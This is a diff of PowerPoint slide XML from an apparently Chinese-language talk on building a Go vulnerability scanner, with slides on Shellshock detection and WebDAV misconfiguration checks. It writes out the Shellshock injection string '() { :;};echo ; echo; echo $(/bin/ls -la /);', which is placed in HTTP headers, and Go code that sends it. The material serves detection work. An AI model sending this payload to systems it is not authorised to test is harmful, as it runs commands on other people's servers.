-              <a:t> := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>range </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>pocList</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t> {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   request</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>err := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="AFBF7E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>http</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>NewRequest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"GET"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>checkURL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>nil</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>request.Header.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Set</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"cookie"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>poc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>request.Header.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Set</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"User-Agent"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>poc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>request.Header.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Set</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"Referrer"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>poc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   resp</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>err := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="AFBF7E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>util</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>RequestDo</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(request</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>true</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6897BB"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>15</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>if </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>err != </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>nil </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>{</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>if </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="AFBF7E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>strings</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Contains</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>resp.ResponseRaw</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>通过网站</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
+              <a:t>www.seebug.org</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
+              <a:t>vuldb</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>/ssvid-88877</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>提供的破壳漏洞检测代码，我们使用想远程的地址发送</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>() { :;};echo ; echo; echo $(/bin/ls -la /);</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
+              <a:t>命令</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>，然后检查响应体，通过检查响应体中是否有</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
               <a:t>drwxr</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
               <a:t>xr</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>-x"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>) &amp;&amp; </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="AFBF7E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>strings</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Contains</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>resp.ResponseRaw</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>etc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>) {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>      result := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="4EADE5"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>d</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.info</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>result.Response</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>resp.ResponseRaw</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>result.Request</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>resp.RequestRaw</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="4EADE5"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>d</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>append</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="4EADE5"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>d</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>result)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>return true</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>-x</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>权限来判断是否能获取权限，虽然漏洞非常危险，但是检测起来思路还是比较明晰，实现代码如下：</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1785634911"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9686266"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -8213,181 +7525,824 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="标题 1">
+          <p:cNvPr id="4" name="矩形 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6B8DE4A-EECC-1A4A-85F2-A2490DCCC6A9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E66787B-38C1-3D45-BFE8-D65BFE28839F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913775" y="618518"/>
-            <a:ext cx="10364452" cy="696716"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Web</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>dav</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>检测</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="文本框 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C62A8A7-AF2A-6845-ACED-09D6760A16E1}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1728592" y="1578279"/>
-            <a:ext cx="8680537" cy="923330"/>
+            <a:off x="2446751" y="0"/>
+            <a:ext cx="6096000" cy="6524863"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
-          <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
+          <a:bodyPr>
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Web</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>dav</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>模块会检测</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>web</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>服务器是否</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>开启了</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>WebDav</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>且配置不当导致攻击者可上传文件到</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>web</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
